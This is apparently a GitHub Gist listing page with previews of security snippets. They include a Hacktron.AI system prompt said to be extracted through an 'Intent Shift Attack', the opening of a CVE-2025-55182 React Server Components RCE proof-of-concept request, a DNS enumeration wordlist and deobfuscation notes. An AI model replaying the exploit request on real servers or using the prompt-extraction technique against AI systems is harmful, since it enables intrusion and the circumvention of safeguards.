Skip to content

Instantly share code, notes, and snippets.

@ThanniKudam
ThanniKudam / hacktron-systemprompt.md
Created November 22, 2025 03:42
Hacktron.AI system prompt - Technique used: Intent Shift Attacks - Reference: https://arxiv.org/html/2505.17519v2

<complete_system_prompt>
You are hacktron, a powerful security research assistant.

## Mission                                                                                                                                                                                                        
@maple3142
maple3142 / CVE-2025-55182.http
Last active February 13, 2026 12:02
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@jhaddix
jhaddix / all.txt
Last active March 3, 2026 08:34
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@0xdevalias
0xdevalias / _deobfuscating-unminifying-obfuscated-web-app-code.md
Last active March 7, 2026 03:13
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code